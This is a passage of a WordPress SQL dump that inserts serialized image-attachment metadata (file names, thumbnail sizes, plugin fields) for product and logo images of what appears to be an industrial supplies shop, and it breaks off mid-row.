INSERT INTO `wp_postmeta` VALUES (21, 15, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:21:"2016/08/Aerospace.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"Aerospace-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"Aerospace-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"Aerospace-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"Aerospace-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"Aerospace-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"Aerospace-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"Aerospace-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"Aerospace-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22, 16, '_wp_attached_file', '2016/08/Automotive.jpg'); 
INSERT INTO `wp_postmeta` VALUES (23, 16, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2400;s:6:"height";i:1800;s:4:"file";s:22:"2016/08/Automotive.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"Automotive-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:22:"Automotive-800x600.jpg";s:5:"width";i:800;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"Automotive-768x576.jpg";s:5:"width";i:768;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"Automotive-1600x1200.jpg";s:5:"width";i:1600;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:22:"Automotive-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"Automotive-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"Automotive-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:22:"Automotive-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (24, 17, '_wp_attached_file', '2016/08/Bearings-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (25, 17, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3888;s:6:"height";i:2592;s:4:"file";s:22:"2016/08/Bearings-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"Bearings-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:22:"Bearings-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"Bearings-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"Bearings-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:22:"Bearings-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"Bearings-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"Bearings-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:22:"Bearings-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (26, 18, '_wp_attached_file', '2016/08/logo-3.png'); 
INSERT INTO `wp_postmeta` VALUES (27, 18, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:167;s:6:"height";i:91;s:4:"file";s:18:"2016/08/logo-3.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (28, 18, '_edit_lock', '1471288876:1'); 
INSERT INTO `wp_postmeta` VALUES (29, 18, '_edit_last', '1'); 
INSERT INTO `wp_postmeta` VALUES (30, 24, '_wp_attached_file', '2016/08/logo_ms.png'); 
INSERT INTO `wp_postmeta` VALUES (31, 24, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:152;s:6:"height";i:83;s:4:"file";s:19:"2016/08/logo_ms.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (32, 25, '_wp_attached_file', '2016/08/teflon-logo.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33, 25, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:404;s:6:"height";i:404;s:4:"file";s:23:"2016/08/teflon-logo.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"teflon-logo-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"teflon-logo-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"teflon-logo-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"teflon-logo-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (34, 26, '_wp_attached_file', '2016/08/bulb.jpg'); 
INSERT INTO `wp_postmeta` VALUES (35, 26, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:300;s:6:"height";i:228;s:4:"file";s:16:"2016/08/bulb.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:16:"bulb-250x228.jpg";s:5:"width";i:250;s:6:"height";i:228;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:16:"bulb-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:16:"bulb-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (36, 27, '_wp_attached_file', '2016/08/catalog.jpg'); 
INSERT INTO `wp_postmeta` VALUES (37, 27, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:220;s:6:"height";i:200;s:4:"file";s:19:"2016/08/catalog.jpg";s:5:"sizes";a:1:{s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"catalog-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (38, 28, '_wp_attached_file', '2016/08/chemours1.png'); 
INSERT INTO `wp_postmeta` VALUES (39, 28, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:220;s:6:"height";i:63;s:4:"file";s:21:"2016/08/chemours1.png";s:5:"sizes";a:1:{s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"chemours1-200x63.png";s:5:"width";i:200;s:6:"height";i:63;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (40, 29, '_wp_attached_file', '2016/08/cleaning.jpg'); 
INSERT INTO `wp_postmeta` VALUES (41, 29, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:260;s:6:"height";i:376;s:4:"file";s:20:"2016/08/cleaning.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"cleaning-260x340.jpg";s:5:"width";i:260;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"cleaning-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"cleaning-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"cleaning-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (42, 30, '_wp_attached_file', '2016/08/cleanroom.jpg'); 
INSERT INTO `wp_postmeta` VALUES (43, 30, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:350;s:6:"height";i:233;s:4:"file";s:21:"2016/08/cleanroom.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"cleanroom-340x233.jpg";s:5:"width";i:340;s:6:"height";i:233;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"cleanroom-250x233.jpg";s:5:"width";i:250;s:6:"height";i:233;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"cleanroom-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"cleanroom-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (44, 31, '_wp_attached_file', '2016/08/coatings.jpg'); 
INSERT INTO `wp_postmeta` VALUES (45, 31, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:220;s:6:"height";i:179;s:4:"file";s:20:"2016/08/coatings.jpg";s:5:"sizes";a:1:{s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"coatings-200x179.jpg";s:5:"width";i:200;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (46, 32, '_wp_attached_file', '2016/08/compounding_oil.jpg'); 
INSERT INTO `wp_postmeta` VALUES (47, 32, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:250;s:6:"height";i:258;s:4:"file";s:27:"2016/08/compounding_oil.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"compounding_oil-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"compounding_oil-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"compounding_oil-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (48, 33, '_wp_attached_file', '2016/08/compressedgas.jpg'); 
INSERT INTO `wp_postmeta` VALUES (49, 33, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:300;s:6:"height";i:328;s:4:"file";s:25:"2016/08/compressedgas.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"compressedgas-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"compressedgas-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"compressedgas-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (50, 34, '_wp_attached_file', '2016/08/concentrate.jpg'); 
INSERT INTO `wp_postmeta` VALUES (51, 34, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:250;s:6:"height";i:258;s:4:"file";s:23:"2016/08/concentrate.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"concentrate-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"concentrate-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"concentrate-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (52, 35, '_wp_attached_file', '2016/08/confidential.jpg'); 
INSERT INTO `wp_postmeta` VALUES (53, 35, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:91;s:4:"file";s:24:"2016/08/confidential.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"confidential-340x91.jpg";s:5:"width";i:340;s:6:"height";i:91;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"confidential-250x91.jpg";s:5:"width";i:250;s:6:"height";i:91;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"confidential-200x91.jpg";s:5:"width";i:200;s:6:"height";i:91;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"confidential-225x91.jpg";s:5:"width";i:225;s:6:"height";i:91;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"confidential-510x91.jpg";s:5:"width";i:510;s:6:"height";i:91;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (54, 36, '_wp_attached_file', '2016/08/dentalmachine.jpg'); 
INSERT INTO `wp_postmeta` VALUES (55, 36, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:590;s:6:"height";i:394;s:4:"file";s:25:"2016/08/dentalmachine.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"dentalmachine-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"dentalmachine-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"dentalmachine-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"dentalmachine-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"dentalmachine-510x394.jpg";s:5:"width";i:510;s:6:"height";i:394;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (56, 37, '_wp_attached_file', '2016/08/ear1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (57, 37, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:640;s:6:"height";i:480;s:4:"file";s:16:"2016/08/ear1.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:16:"ear1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:16:"ear1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:16:"ear1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:16:"ear1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:16:"ear1-510x480.jpg";s:5:"width";i:510;s:6:"height";i:480;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (58, 38, '_wp_attached_file', '2016/08/ear2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (59, 38, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:640;s:6:"height";i:480;s:4:"file";s:16:"2016/08/ear2.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:16:"ear2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:16:"ear2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:16:"ear2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:16:"ear2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:16:"ear2-510x480.jpg";s:5:"width";i:510;s:6:"height";i:480;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (60, 39, '_wp_attached_file', '2016/08/jar.jpg'); 
INSERT INTO `wp_postmeta` VALUES (61, 39, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:590;s:6:"height";i:250;s:4:"file";s:15:"2016/08/jar.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:15:"jar-340x250.jpg";s:5:"width";i:340;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:15:"jar-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:15:"jar-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:15:"jar-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:15:"jar-510x250.jpg";s:5:"width";i:510;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s